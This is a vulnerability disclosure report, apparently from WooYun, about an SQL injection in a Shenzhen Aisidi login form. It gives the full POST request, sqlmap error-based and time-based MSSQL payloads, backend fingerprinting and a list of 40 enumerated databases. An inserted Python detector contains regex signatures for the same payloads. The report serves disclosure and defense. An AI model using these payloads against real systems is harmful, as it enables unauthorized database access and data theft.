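Vulnerability summary

Bug ID: wooyun-2015-0137663

Title: High-risk SQL injection in an Aisidi (爱施德) core system leaks a large amount of information

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-08-31 22:55

Fixed: 2015-10-17 09:58

Disclosed: 2015-10-17 09:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]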


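Vulnerability details

Disclosure status:

2015-08-31: Details reported to the vendor; awaiting vendor handling
2015-09-02: cncert (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying agency
2015-09-12: Details disclosed to core white hats and experts in related fields
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to trainee white hats
2015-10-17: Details disclosed to the public

Brief description:

Shenzhen Aisidi Co., Ltd. (深圳市爱施德股份有限公司) was founded in June 1998 with a registered capital of 999,100,000 yuan. It is a listed company (stock code: 002416) dedicated to introducing and promoting the latest mobile communication and digital electronics products from around the world. Its strong operations and comprehensive customer service have established the company as a core distributor in China for well-known domestic and international brands and as a leader in channel services. On May 28, 2010, the company was officially listed on the Shenzhen Stock Exchange, entering a new stage of development.

Detailed description: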

http://**.**.**.**/
Vulnerable address:

POST / HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 524
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hbsrotricle1k1s1vffiupge
__VIEWSTATE=%2FwEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAUaL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWRiNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO%2Fj5eNWIRnZznQ%2BzOT9Yfau%2BUdByvfE%3D&__VIEWSTATEGENERATOR=5A2128B1&__EVENTVALIDATION=%2FwEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI%2BjB3Y2%2BMc6SrnAqio3oCKbxYaCysx15DoHQO%2Bp6WIO0%2FCMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo%3D&txtUsername=admin&txtPassword=admin&btnSignin=%E7%99%BB%E5%BD%95


Payload:

---
Parameter: txtUsername (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAU
aL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWR
iNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO/j5eNWIRnZznQ+zOT9Yfau+UdByvfE=&__VIEWSTATEGENERATOR=5A2128B1&__EV
ENTVALIDATION=/wEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI+jB3Y2+Mc6SrnAqio3oCKbxYaCysx15DoHQO+p6W
IO0/CMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo=&txtUsername=admin'+(SELECT 'sUDM' WHERE 5374=5374
AND 7692=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (
7692=7692) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113))))+'&t
xtPassword=admin&btnSignin=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: __VIEWSTATE=/wEPDwUKMTAzMzQ2ODc4Mw8WAh4EVk51bQUEODU1MhYEAgMPZBYCAgcPDxYCHghJbWFnZVVybAU
aL1ZhbGlkYXRlQ29kZS5hc3B4P3ZtPTg1NTJkZAIFDw9kFgIeA3NyYwUuUVJDb2RlSW1nLzg4MmQ3ZjVjZDk2MzQ3MDM4NDA5NWR
iNTBhNDcyNjE3LnBuZ2RkuUwognsmsuguO/j5eNWIRnZznQ+zOT9Yfau+UdByvfE=&__VIEWSTATEGENERATOR=5A2128B1&__EV
ENTVALIDATION=/wEdAAROxw3bFWyN2I7izyc79NNUVK7BrRAtEiqu9nGFEI+jB3Y2+Mc6SrnAqio3oCKbxYaCysx15DoHQO+p6W
IO0/CMpFr72F0FUI8gkygcs2qj7Lv9HP0X002uxtNsv84AuXo=&txtUsername=admin'+(SELECT 'FgSJ' WHERE 5772=5772
AND 9070=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,
sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'&txtPassword=admin&btnSignin=%E7%99%BB%E5%BD%9
5
---
[14:26:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
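
A detection-side sketch for the two payload types sqlmap reports above, added here as an example and not part of the original report: it decodes a form-urlencoded login body and flags the MSSQL error-based and heavy-query patterns in any field. The signature labels, the `inspect_form_body` and `login_body` helpers, and the sample bodies are constructed for illustration.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlencode

# Signatures modelled on the two payload types in the sqlmap output above
# (error-based CONVERT(INT, ...) and the heavy-query sysusers cross join).
# The labels are made up for this example.
SIGNATURES = [
    ("mssql-error-based-convert",
     re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I)),
    ("mssql-char-concatenation",
     re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){3,}", re.I)),
    ("mssql-heavy-query-sysusers",
     re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*(?:,\s*sysusers\s+AS\s+\w+\s*){2,}", re.I)),
    ("quote-then-subselect",
     re.compile(r"'\s*\+\s*\(\s*SELECT\b", re.I)),
]


def inspect_form_body(body: str) -> List[Tuple[str, str]]:
    """Decode a form-urlencoded body and return (field, signature) hits."""
    hits = []
    # parse_qs percent-decodes names and values, so %27 and %2B are seen as ' and +.
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((field, label))
    return hits


def login_body(username: str) -> str:
    """Build a constructed login POST body using the field names from the request above."""
    return urlencode({
        "__VIEWSTATEGENERATOR": "5A2128B1",
        "txtUsername": username,
        "txtPassword": "admin",
        "btnSignin": "登录",
    })


# Constructed samples: one benign login and shortened forms of the two payloads
# shown in the sqlmap output.
BENIGN = login_body("admin")
ERROR_BASED = login_body(
    "admin'+(SELECT 'sUDM' WHERE 5374=5374 AND 7692=CONVERT(INT,(SELECT "
    "CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))))+'"
)
TIME_BASED = login_body(
    "admin'+(SELECT 'FgSJ' WHERE 5772=5772 AND 9070=(SELECT COUNT(*) FROM "
    "sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4))+'"
)

if __name__ == "__main__":
    for name, body in [("benign", BENIGN),
                       ("error-based", ERROR_BASED),
                       ("time-based", TIME_BASED)]:
        print(name, inspect_form_body(body))
```

Run over logged POST bodies, this works as an alerting aid; pattern matching of this kind does not replace binding `txtUsername` as a query parameter in the login handler.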

Proof of vulnerability:

Databases:

available databases [40]:
[*] Aisidi_Workflow
[*] BI_DataCenter
[*] codii_MSCRM
[*] codii_MSCRM_ADDON
[*] COODOODB
[*] DATA Analysis
[*] desktop
[*] DW_ASDBI
[*] DW_JTBI
[*] DW_NEW
[*] FBM
[*] HRM
[*] K2Categories
[*] K2Dependencies
[*] K2EnvironmentSettings
[*] K2EventBus
[*] K2EventBusScheduler
[*] K2HostServer
[*] K2Server
[*] K2ServerBak
[*] K2ServerLog
[*] K2SmartBox
[*] K2SmartBroker
[*] K2SQLUM
[*] K2WebDesigner
[*] K2WebWorkflow
[*] K2Workspace
[*] master
[*] moa
[*] model
[*] MSCRM_CONFIG
[*] msdb
[*] OA
[*] OAEXP
[*] ReportServer
[*] ReportServerTempDB
[*] SAPBO
[*] tempdb
[*] zkeco_db
[*] zkeco_dblan



DBA privileges

Fix:

Filtering

Copyright notice: when reposting, please credit the source 路人甲@乌云


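Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-02 09:56

Vendor reply:

CNVD confirms the situation as described and has notified the software vendor (or site operator) by e-mail through its public contact channels; the vendor is to provide a solution and coordinate handling with the affected user organizations.

Latest status:

None yet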